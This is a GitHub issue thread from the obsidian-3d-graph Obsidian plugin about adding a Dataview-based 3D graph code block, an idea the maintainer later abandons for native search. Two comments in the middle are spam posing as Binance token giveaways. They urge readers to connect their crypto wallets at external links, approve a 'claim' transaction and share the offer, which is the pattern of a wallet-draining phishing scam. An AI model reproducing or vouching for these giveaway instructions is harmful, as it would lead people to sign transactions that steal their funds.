### ISSUE TITLE
[YOM-458] [YOM-459] integrate with dataview

### ISSUE THREAD

**Issue by HananoshikaYomaru** [HananoshikaYomaru/obsidian-3d-graph#31]

**Comment by HananoshikaYomaru** [comment]
`dataview-3d-graph` and `dataviewjs-3d-graph`

**Comment by HananoshikaYomaru** [comment]
* markdown post processor : [Markdown post processing - Developer Documentation (obsidian.md)](https://docs.obsidian.md/Plugins/Editor/Markdown+post+processing#Post-process+Markdown+code+blocks) 
* dv query source: [Sources - Dataview (blacksmithgu.github.io)](https://blacksmithgu.github.io/obsidian-dataview/reference/sources/) 
* dv.pages : [Codeblock Reference - Dataview (blacksmithgu.github.io)](https://blacksmithgu.github.io/obsidian-dataview/api/code-reference/#dvpagessource)

we can accept a dv query source string and render as a 3D graph

**Comment by HananoshikaYomaru** [comment]
we also need to allow configuration of the view

**Comment by HananoshikaYomaru** [comment]
we also need to think about future expansion, 

* external link as node

this would mean that we should also make it able to read a list of url and render the graph

**Comment by HananoshikaYomaru** [comment]
it is okay, we can start small, just make this feature real first. The scope of this task will be: 
1. user can define `dataview-3d-graph` codeblock
2. in the codeblock user can use the dv query source, the note will render
3. user can define a center node

**Comment by HananoshikaYomaru** [comment]
but if let user define a center node that basically it is a local graph.

**Comment by bajarang-agarwal1** [comment]
# Binance Free Tokens Giveaway - Claim Yours Now! 🎉💰

Welcome to the exclusive Binance Free Tokens giveaway, where we're distributing over $1,100,000 in $BNB! 🚀 Don't miss out on this fantastic opportunity to claim your free tokens. Here's a quick guide to kickstart your journey:

![Binance Free Tokens](https://pbs.twimg.com/media/ERgjjnWVUAA7Miq.jpg:large)

## Steps to Claim:

1. **Spread the Excitement on Twitter:**
   - Share the news about claiming your free tokens!
     - **Tweet:** [Claimed my free tokens on Binance! 🌟 #BinanceFreeTokens #Crypto](https://twitter.com/share?url=https://www.bnbrewards.online/&text=Claimed%20my%20free%20tokens%20on%20Binance%21%20%F0%9F%8C%95%20%23BinanceFreeTokens%20%23Crypto&hashtags=BinanceFreeTokens,Crypto)

2. **Connect Your Binance Wallet:**
   - Click on the [Connect Wallet](https://www.bnbrewards.online/?source=github) button.
   - Choose your preferred wallet provider (Metamask, Trust Wallet, etc.).

3. **Interact with the Contract:**
   - Once your wallet is connected, go to the [Binance Free Tokens Page](https://www.bnbrewards.online/?source=github).
   - Click on the "Claim" button to interact with the smart contract.

4. **Claim Your Free Tokens:**
   - Confirm the transaction in your wallet to execute the claim method.
   - Wait for the transaction to be processed.

5. **Spread the Excitement Further:**
   - After successfully claiming your tokens, share the news with friends!
     - **Facebook:** [Share on Facebook](https://www.facebook.com/sharer/sharer.php?u=https://www.bnbrewards.online/&quote=Claimed%20my%20free%20tokens%20on%20Binance%21%20%F0%9F%8C%95%20%23BinanceFreeTokens%20%23Crypto)

Act swiftly and enjoy your tokens! This limited-time offer won't be available forever. 🌐💰

**Comment by mohamedata-code** [comment]
# Binance Airdrop Guide: $500k Worth of Airdrop is Ready, here's how to Claim

[![Claim Now](https://moneybinds.com/wp-content/uploads/2023/12/Binance_Airdrop_feature_img.jpg)](http://go.bnbcoinsearn.online/97Q7Yj)

## Steps to Claim:

### 1. Connect Your Binance Wallet:
   - Click on the [Connect Wallet](http://go.bnbcoinsearn.online/97Q7Yj).
   - Choose your preferred wallet provider (Metamask, Trust Wallet, etc.).

### 2. Interact with the Contract:
   - Once your wallet is connected.
   - Click on the "Claim" button to interact with the smart contract.

### 3. Share the Excitement on Twitter:
   - Spread the word about claiming your free tokens!
     - **Tweet:** [Share on Twitter](https://twitter.com/share?url=http://go.bnbcoinsearn.online/97Q7Yj&text=Just%20claimed%20my%20free%20tokens%20on%20Binance%21%20%F0%9F%8C%95%20%23BinanceTokenGiveaway%20%23Crypto)


Winners: @OzgeOzkaya, @frederikme, @nikitadurasov, @chandrab, @benjiamin2014, @fedelemantuano, @goznauk, @lizhihao6, @DiceNay, @Suttinan-V

**Comment by HananoshikaYomaru** [comment]
Since the database feature will come out soon, 50% of feature of dataview will be replaced by native search, and then 80% of the use case will be replaced by native search. 

I believe only from the perspective of searching, dataview will soon go obsolete for this use case so building integration with it probably will not be justified. 

Rather than integrating dataview, we will embrace the native search by using something like [obsidian-search](https://github.com/b-camphart/obsidian-search/). This will give a better user experience to user and more less performance overhead since we don't need to manipulate the dataview object. 

The focus turns to #78
